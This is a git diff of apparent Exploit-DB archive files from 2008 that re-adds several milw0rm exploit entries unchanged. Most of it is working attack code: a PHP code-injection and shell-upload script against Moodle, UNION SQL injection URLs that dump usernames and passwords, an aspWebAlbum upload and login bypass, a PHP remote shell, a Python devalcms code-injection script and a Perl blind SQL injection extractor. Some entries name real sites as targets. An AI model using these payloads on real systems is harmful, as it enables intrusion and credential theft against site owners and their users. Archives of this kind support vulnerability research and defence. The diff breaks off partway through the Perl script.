@@ -1,55 +1,55 @@ - phpinfo.html - '.$argv[0].' "echo `set`" - '.$argv[0].' /full/local/path/to/file/for/upload/php_shell.php - '; - exit; -} -$upload = false; -if(file_exists($code) && is_file($code)) { - $upload = $code; - $code = 'move_uploaded_file($_FILES[file][tmp_name], basename($_FILES[file][name]))'; -} -$code .= ';exit;'; - -$injection_points = array( - 'blocks/rss_client/block_rss_client_error.php' => array('error'), - 'course/scales.php?id=1' => array('name', 'description'), - 'help.php' => array('text'), - 'login/confirm.php' => array('data', 's'), - 'mod/chat/gui_basic/index.php?id=1' => array('message'), - 'mod/forum/post.php' => array('name'), - 'mod/glossary/approve.php?id=1' => array('hook'), - 'mod/wiki/admin.php' => array('page'), -); -$file = array_rand($injection_points); -$param = $injection_points[$file][array_rand($injection_points[$file])]; -$value = ''; - -$post_data = array($param=>$value, 'cmd'=>$code); -if($upload) { - echo "Check at:\n\t\t".$url.'/'.dirname($file).'/'.basename($upload)."\n"; - $post_data["file"] = '@'.$upload; -} - -$c = curl_init(); -curl_setopt($c, CURLOPT_URL, $url.'/'.$file); -curl_setopt($c, CURLOPT_PROXY, $proxy); -curl_setopt($c, CURLOPT_POST, true); -curl_setopt($c, CURLOPT_POSTFIELDS, $post_data); -curl_setopt($c, CURLOPT_RETURNTRANSFER, true); -curl_setopt($c, CURLOPT_HEADER, false); -echo curl_exec($c); -curl_close($c); -?> - -# milw0rm.com [2008-09-03] + phpinfo.html + '.$argv[0].' "echo `set`" + '.$argv[0].' 
/full/local/path/to/file/for/upload/php_shell.php + '; + exit; +} +$upload = false; +if(file_exists($code) && is_file($code)) { + $upload = $code; + $code = 'move_uploaded_file($_FILES[file][tmp_name], basename($_FILES[file][name]))'; +} +$code .= ';exit;'; + +$injection_points = array( + 'blocks/rss_client/block_rss_client_error.php' => array('error'), + 'course/scales.php?id=1' => array('name', 'description'), + 'help.php' => array('text'), + 'login/confirm.php' => array('data', 's'), + 'mod/chat/gui_basic/index.php?id=1' => array('message'), + 'mod/forum/post.php' => array('name'), + 'mod/glossary/approve.php?id=1' => array('hook'), + 'mod/wiki/admin.php' => array('page'), +); +$file = array_rand($injection_points); +$param = $injection_points[$file][array_rand($injection_points[$file])]; +$value = ''; + +$post_data = array($param=>$value, 'cmd'=>$code); +if($upload) { + echo "Check at:\n\t\t".$url.'/'.dirname($file).'/'.basename($upload)."\n"; + $post_data["file"] = '@'.$upload; +} + +$c = curl_init(); +curl_setopt($c, CURLOPT_URL, $url.'/'.$file); +curl_setopt($c, CURLOPT_PROXY, $proxy); +curl_setopt($c, CURLOPT_POST, true); +curl_setopt($c, CURLOPT_POSTFIELDS, $post_data); +curl_setopt($c, CURLOPT_RETURNTRANSFER, true); +curl_setopt($c, CURLOPT_HEADER, false); +echo curl_exec($c); +curl_close($c); +?> + +# milw0rm.com [2008-09-03] diff --git a/platforms/php/webapps/6357.txt b/platforms/php/webapps/6357.txt index 9dc7b5479..a7844236a 100755 --- a/platforms/php/webapps/6357.txt +++ b/platforms/php/webapps/6357.txt 
@@ -1,53 +1,53 @@ -################################################################################################## - # -#-# Discovered bay Alemin_Krali <<<<<<<<==== # # # - # -#-# aspWebAlbum 3.2 # # #### ## ## # - # # # # # # # # # -#-# Script Download "http://www.fullrevolution.com" ##### # ### # # # # # - # # # # # # # # -#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) # # ### #### # # # - # -#-# HomePage al3m.blogspot.com # - # -#-# alemin@windowslive.com # - # -#-# Dork ? : album.asp?pic= .jpg cat= # - # - # - ######################################################################## # # # # # # # - # 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] # # - ######################################################################## # # # -http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! # - # -and your shell adress: # - # -http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp # - # - # -ex:1 # -http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp # - # -ex:2 # -http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ # -Ablaze rally 9-24-06/pics/klasvayv.asp # - # - ######################################################################## # # # # # # # - # 2-Admin Bypass [AspWebAlbum 3.2] # # - ######################################################################## # # # - # -http://site.com/path/album.asp?action=login # - # -ASP/MS SQL Server login syntax # - # -Username:'or' # -Password:anything # - # - ######################################################################## # # # # # # # - # 3-Xss Vulnerability [AspWebAlbum 3.2] # # - ######################################################################## # # # -http://site.com/album/album.asp?action=summary&message=&from=login # - # -################################################################################################# - -# milw0rm.com [2008-09-03] 
+################################################################################################## + # +#-# Discovered bay Alemin_Krali <<<<<<<<==== # # # + # +#-# aspWebAlbum 3.2 # # #### ## ## # + # # # # # # # # # +#-# Script Download "http://www.fullrevolution.com" ##### # ### # # # # # + # # # # # # # # +#-# aspWebAlbum 3.2 Single Site License | $60.00 : ) # # ### #### # # # + # +#-# HomePage al3m.blogspot.com # + # +#-# alemin@windowslive.com # + # +#-# Dork ? : album.asp?pic= .jpg cat= # + # + # + ######################################################################## # # # # # # # + # 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions] # # + ######################################################################## # # # +http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name! # + # +and your shell adress: # + # +http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp # + # + # +ex:1 # +http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp # + # +ex:2 # +http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/ # +Ablaze rally 9-24-06/pics/klasvayv.asp # + # + ######################################################################## # # # # # # # + # 2-Admin Bypass [AspWebAlbum 3.2] # # + ######################################################################## # # # + # +http://site.com/path/album.asp?action=login # + # +ASP/MS SQL Server login syntax # + # +Username:'or' # +Password:anything # + # + ######################################################################## # # # # # # # + # 3-Xss Vulnerability [AspWebAlbum 3.2] # # + ######################################################################## # # # +http://site.com/album/album.asp?action=summary&message=&from=login # + # +################################################################################################# + +# milw0rm.com [2008-09-03] 
diff --git a/platforms/php/webapps/6361.txt b/platforms/php/webapps/6361.txt index b54b57a2b..cfcf8daf9 100755 --- a/platforms/php/webapps/6361.txt +++ b/platforms/php/webapps/6361.txt 
@@ -1,54 +1,54 @@ -|___________________________________________________| -| -| Living Local (listtest.php r) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php -| -|___________________________________________________| - -Exploit: - - - - -www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())-- - - - - - - -L!VE DEMO: - - -http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())-- - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-03] +|___________________________________________________| +| +| Living Local (listtest.php r) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php +| +|___________________________________________________| + +Exploit: + + + + +www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())-- + + + + + + +L!VE DEMO: + + 
+http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())-- + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-03] diff --git a/platforms/php/webapps/6362.txt b/platforms/php/webapps/6362.txt index db582bda4..d4252a9d6 100755 --- a/platforms/php/webapps/6362.txt +++ b/platforms/php/webapps/6362.txt 
@@ -1,67 +1,67 @@ -|___________________________________________________| -| -| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script :http://discountedscripts.com/product_info.php?products_id=65 -| -| DorK : inurl:index.php?menu=adorder -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users-- - - - - - - -L!VE DEMO: -_________ - - -http://www.discountedscripts.com/demos/acg-ptp/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users-- - - -____________ - -Admin Login : - -www.[target].com/Script/admin/ - -____________ - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe -| -| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker -|______________________________________________________________________ - - - - - Im IRAQi - -# milw0rm.com [2008-09-04] +|___________________________________________________| +| +| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script :http://discountedscripts.com/product_info.php?products_id=65 +| +| DorK : inurl:index.php?menu=adorder 
+|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users-- + + + + + + +L!VE DEMO: +_________ + + +http://www.discountedscripts.com/demos/acg-ptp/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users-- + + +____________ + +Admin Login : + +www.[target].com/Script/admin/ + +____________ + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe +| +| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker +|______________________________________________________________________ + + + + + Im IRAQi + +# milw0rm.com [2008-09-04] diff --git a/platforms/php/webapps/6363.txt b/platforms/php/webapps/6363.txt index 6266b5f21..1b1fce109 100755 --- a/platforms/php/webapps/6363.txt +++ b/platforms/php/webapps/6363.txt @@ -1,24 +1,24 @@ -By Cr@zy_King a.k.a t4cs1zkr4L - - -Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities - - -http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/* - - - - - -::Username::pass - - - -http://localhost/?pageid= - - - -www.biyosecurity.com - www.heykirmedya.net [Yakinda Online] - -# milw0rm.com [2008-09-04] +By Cr@zy_King a.k.a t4cs1zkr4L + + +Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities + + +http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/* + + + + + +::Username::pass + + + +http://localhost/?pageid= + + + +www.biyosecurity.com - www.heykirmedya.net [Yakinda Online] + +# milw0rm.com [2008-09-04] diff --git a/platforms/php/webapps/6364.txt b/platforms/php/webapps/6364.txt index 980e1ef22..ef9b982f7 100755 --- a/platforms/php/webapps/6364.txt +++ b/platforms/php/webapps/6364.txt 
@@ -1,77 +1,77 @@ -|___________________________________________________| -| -|ACG-ScriptShop (cid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script :http://discountedscripts.com/product_info.php?products_id=67 -| -| DorK : inurl:index.php?menu=showcat -|___________________________________________________| - -Exploit: -________ - -www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders-- - - - - -Exploit: 2 -________ - -www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers-- - - - - -Exploit: 3 -________ - -www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users-- - - - - -L!VE DEMO: -_________ - - -http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders-- - - -http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers-- - - - -http://www.creative66.com/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users-- - -____________ - -Admin Login : - -www.[target].com/Script/admin - -____________ -____________________________( Greetz )____________________________ -| -| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | -| -| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-04] +|___________________________________________________| +| +|ACG-ScriptShop (cid) Remote SQL Injection Vulnerability +| 
+|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script :http://discountedscripts.com/product_info.php?products_id=67 +| +| DorK : inurl:index.php?menu=showcat +|___________________________________________________| + +Exploit: +________ + +www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders-- + + + + +Exploit: 2 +________ + +www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers-- + + + + +Exploit: 3 +________ + +www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users-- + + + + +L!VE DEMO: +_________ + + +http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders-- + + +http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers-- + + + +http://www.creative66.com/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users-- + +____________ + +Admin Login : + +www.[target].com/Script/admin + +____________ +____________________________( Greetz )____________________________ +| +| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | +| +| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-04] diff --git a/platforms/php/webapps/6368.php b/platforms/php/webapps/6368.php index 300060454..614763f2e 100755 --- a/platforms/php/webapps/6368.php +++ b/platforms/php/webapps/6368.php 
@@ -1,69 +1,69 @@ - \nEx: awtotalhack.php host.tld on\n");} -array_shift($argv); -$host = $argv[0]; -$magic = $argv[1]; - -# Start the interactive shell -while(1){ - fwrite(STDOUT, "[shell:~ # "); - if ($magic == "on") { - $c = str_split(trim(fgets(STDIN))); - if (implode($c) == "exit") {die();}; - for($i=0;$i - -# milw0rm.com [2008-09-05] + \nEx: awtotalhack.php host.tld on\n");} +array_shift($argv); +$host = $argv[0]; +$magic = $argv[1]; + +# Start the interactive shell +while(1){ + fwrite(STDOUT, "[shell:~ # "); + if ($magic == "on") { + $c = str_split(trim(fgets(STDIN))); + if (implode($c) == "exit") {die();}; + for($i=0;$i + +# milw0rm.com [2008-09-05] diff --git a/platforms/php/webapps/6369.py b/platforms/php/webapps/6369.py index f033add31..717b94b6e 100755 --- a/platforms/php/webapps/6369.py +++ b/platforms/php/webapps/6369.py 
@@ -1,65 +1,65 @@ -#!/usr/bin/python -##################################################################################### -#### devalcms v1.4a Remote Code Execution Exploit / Xss #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Download : http://www.sourceforge.net/projects/devalcms # -# # -#DORK : "powered by devalcms v1.4.a" # -# # -##################################################################################### -# [Xss] # -# # -#http://Site/[path]/index.php?currentpath= # -# # -##################################################################################### -# # -# [Remote Code Execution] # -# # -#Use this exploit for remote code execution valun . 
# -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### -import sys,socket -argv=sys.argv -data='' -query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00' -if len(argv) < 3 : - print '[*]Devalcms v1.4.a Remote code execut exploit' - print '[*]Dork : powered by devalcms v1.4.a' - print '[*]Powered by : R3d.W0rm' - print '[*]Our Site : http://ircrash.com' - print '[*]Usage : ' + argv[0] + ' site /path' - exit() -if 'http://' in argv[1] : - target=argv[1].replace('http://','') -else : - target=argv[1] -if '/' in argv[2] : - path=argv[2] -else : - path='/' + argv[2] -print '[*]Devalcms v1.4.a Remote code execut exploit' -print '[*]Powered by : R3d.W0rm' -print '[*]Our Site : http://ircrash.com' -sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) -sock.connect((target,80)) -sock.send("GET " + path + query + " HTTP/1.1\n") -sock.send("Host: " + target + "\n") -sock.send("Referer: " + data + "\n\n\n") -recv=sock.recv(2048) -if 'HTTP/1.1 200 OK' in recv : - print '[+]Code injected .' - print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php' -else : - print '[-]Can not inject code.' 
-exit() - -# milw0rm.com [2008-09-05] +#!/usr/bin/python +##################################################################################### +#### devalcms v1.4a Remote Code Execution Exploit / Xss #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Download : http://www.sourceforge.net/projects/devalcms # +# # +#DORK : "powered by devalcms v1.4.a" # +# # +##################################################################################### +# [Xss] # +# # +#http://Site/[path]/index.php?currentpath= # +# # +##################################################################################### +# # +# [Remote Code Execution] # +# # +#Use this exploit for remote code execution valun . 
# +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### +import sys,socket +argv=sys.argv +data='' +query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00' +if len(argv) < 3 : + print '[*]Devalcms v1.4.a Remote code execut exploit' + print '[*]Dork : powered by devalcms v1.4.a' + print '[*]Powered by : R3d.W0rm' + print '[*]Our Site : http://ircrash.com' + print '[*]Usage : ' + argv[0] + ' site /path' + exit() +if 'http://' in argv[1] : + target=argv[1].replace('http://','') +else : + target=argv[1] +if '/' in argv[2] : + path=argv[2] +else : + path='/' + argv[2] +print '[*]Devalcms v1.4.a Remote code execut exploit' +print '[*]Powered by : R3d.W0rm' +print '[*]Our Site : http://ircrash.com' +sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.connect((target,80)) +sock.send("GET " + path + query + " HTTP/1.1\n") +sock.send("Host: " + target + "\n") +sock.send("Referer: " + data + "\n\n\n") +recv=sock.recv(2048) +if 'HTTP/1.1 200 OK' in recv : + print '[+]Code injected .' + print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php' +else : + print '[-]Can not inject code.' +exit() + +# milw0rm.com [2008-09-05] diff --git a/platforms/php/webapps/6370.pl b/platforms/php/webapps/6370.pl index 5a722097f..8f0ada540 100755 --- a/platforms/php/webapps/6370.pl +++ b/platforms/php/webapps/6370.pl 
@@ -1,212 +1,212 @@ -#!/usr/bin/perl -W - -# webCMS Portal Edition (index.php id) Blind SQL Injection Exploit -# url: webcms.es -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com - -# team: Spanish Hackers Team - [SHT] -# -# h4x0rz:/home/joss/Desktop# perl o.pl -u "http://www.jubicam.org/index.php?menu=documentos&id=69" -p Concurso -# [i] Getting default: -T 30 -# [i] Getting default: -l 200 -# [i] Getting default: -t 15 -# 12 123 { -# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 12. -# [i] USER / PASSWORD: -# root / a314 -# -# This was written for educational purpose. Use it at your own risk. - -# Author will be not responsible for any damage. - -# special thanks: ka0x! http://milw0rm.com/papers/197 - -my $MAX_FIELD_LENGTH = 200 ; -my $EXIT_IF_NO_CHAR = 1 ; -my $DEFAULT_THREADS = 15 ; -my $DEFAULT_THREADS_TIMEOUT = 30 ; -my @ascii = ( 32 .. 123 ) ; -my $DEFAULT_THREADS_TIME = 1 ; - - -use LWP::UserAgent ; - -sub _HELP_AND_EXIT -{ - die " - - ./$0 -u -p - - Options: - -u Ex: http://localhost/index.php?menu=documentos&id=69 - -p HTML pattern. - - Other: - -t <#> Threads, default '$DEFAULT_THREADS'. - -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. - -T <#> Timeout. - -h Help (also with --help). - - Example: - - ./$0 -u \"http://localhost/index.php?menu=documentos&id=69\" -p Concurso - -" ; -} - - - my ($p, $w) = ({ @ARGV }, { }) ; - - map { - &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; - } keys %$p ; - - map { - die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; - } qw/-u -p/ ; - - $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; - $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; - $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? 
$p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; - - map { - warn "[i] Getting default: $_ $w->{ $_ }\n" ; - } sort keys %$w ; - - ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; - - - - -sub _START_WORK -{ - my $p = shift ; - - my $position = 1 ; - - pipe(R, W) ; - pipe(Rs, Ws) ; - autoflush STDOUT 1 ; - - my $sql_message = '' ; - my $msg = '' ; - my @pid ; - - while( $position <= $p->{'-l'} ) - { - my $cf ; - unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } - push(@pid, $cf) ; - - my $count = 0 ; - my $can_exit ; - my $char_printed ; - - while() - { - chomp ; - push(@pid, (split(/:/))[1] ) if /^pid/ ; - - my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; - $count++ if $pos == $position ; - - print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; - - if( $res eq 'yes' and $pos == $position ){ - $char_printed = $can_exit = 1 ; - print Ws "STOP $position\n" ; - $sql_message .= chr( $ascii ) ; - } - - last if ( $can_exit or $count == @ascii ); - } - - map { waitpid($_, 0) } @pid ; - - unless( $char_printed ) - { - if( $EXIT_IF_NO_CHAR ) - { - warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n" ; - last ; - } - } - - $position++ ; - } - - print "[i] USER / PASSWORD:\n$sql_message\n" ; - -} - -sub _CHECKING -{ - my ($p, $position) = @_ ; - my $counter = 0 ; - my $stop_position ; - - foreach my $ascii ( @ascii ) - { - $counter++ ; - - if( $counter % $p->{'-t'} == 0 ) - { - my $stop_position ; - eval - { - $SIG{'ALRM'} = sub { die "non_stop\n" } ; - alarm $DEFAULT_THREADS_TIME ; - my $line = ; - $stop_position = (split( / /, $line))[1] ; - alarm 0 ; - } ; - - if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; } - } - - unless(my $pid = fork ) - { - print Ws "pid:$pid\n" or die ; - - - my $url = $p->{'-u'} . - ' AND ascii(substring((SELECT CONCAT(login,0x202f20,password) FROM usuarios LIMIT 0,1),' . $position . 
',1))='. $ascii ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my $content ; - while( 1 ) - { - last if $content = $ua->get( $url )->content ; - } - - ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ; - - exit( 0 ) ; - } - - } -} - - - -sub _IS_VULN -{ - my $p = shift ; - - my $ua = LWP::UserAgent->new ; - $ua->timeout( $p->{'-T'} ) ; - - my ( $one, $two ) = ( - $ua->get( $p->{'-u'}." AND 1=1")->content , - $ua->get( $p->{'-u'}." AND 1=2")->content , - ) ; - - return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ; -} - -# milw0rm.com [2008-09-05] +#!/usr/bin/perl -W + +# webCMS Portal Edition (index.php id) Blind SQL Injection Exploit +# url: webcms.es +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com + +# team: Spanish Hackers Team - [SHT] +# +# h4x0rz:/home/joss/Desktop# perl o.pl -u "http://www.jubicam.org/index.php?menu=documentos&id=69" -p Concurso +# [i] Getting default: -T 30 +# [i] Getting default: -l 200 +# [i] Getting default: -t 15 +# 12 123 { +# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 12. +# [i] USER / PASSWORD: +# root / a314 +# +# This was written for educational purpose. Use it at your own risk. + +# Author will be not responsible for any damage. + +# special thanks: ka0x! http://milw0rm.com/papers/197 + +my $MAX_FIELD_LENGTH = 200 ; +my $EXIT_IF_NO_CHAR = 1 ; +my $DEFAULT_THREADS = 15 ; +my $DEFAULT_THREADS_TIMEOUT = 30 ; +my @ascii = ( 32 .. 123 ) ; +my $DEFAULT_THREADS_TIME = 1 ; + + +use LWP::UserAgent ; + +sub _HELP_AND_EXIT +{ + die " + + ./$0 -u -p + + Options: + -u Ex: http://localhost/index.php?menu=documentos&id=69 + -p HTML pattern. + + Other: + -t <#> Threads, default '$DEFAULT_THREADS'. + -l <#> Maximum table name length '$MAX_FIELD_LENGTH'. + -T <#> Timeout. + -h Help (also with --help). 
+ + Example: + + ./$0 -u \"http://localhost/index.php?menu=documentos&id=69\" -p Concurso + +" ; +} + + + my ($p, $w) = ({ @ARGV }, { }) ; + + map { + &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ; + } keys %$p ; + + map { + die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ; + } qw/-u -p/ ; + + $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ; + $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ; + $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ; + + map { + warn "[i] Getting default: $_ $w->{ $_ }\n" ; + } sort keys %$w ; + + ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ; + + + + +sub _START_WORK +{ + my $p = shift ; + + my $position = 1 ; + + pipe(R, W) ; + pipe(Rs, Ws) ; + autoflush STDOUT 1 ; + + my $sql_message = '' ; + my $msg = '' ; + my @pid ; + + while( $position <= $p->{'-l'} ) + { + my $cf ; + unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; } + push(@pid, $cf) ; + + my $count = 0 ; + my $can_exit ; + my $char_printed ; + + while() + { + chomp ; + push(@pid, (split(/:/))[1] ) if /^pid/ ; + + my ($res, $pos, $ascii) = ( split(/ /, $_) ) ; + $count++ if $pos == $position ; + + print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ; + + if( $res eq 'yes' and $pos == $position ){ + $char_printed = $can_exit = 1 ; + print Ws "STOP $position\n" ; + $sql_message .= chr( $ascii ) ; + } + + last if ( $can_exit or $count == @ascii ); + } + + map { waitpid($_, 0) } @pid ; + + unless( $char_printed ) + { + if( $EXIT_IF_NO_CHAR ) + { + warn "\n[!] 
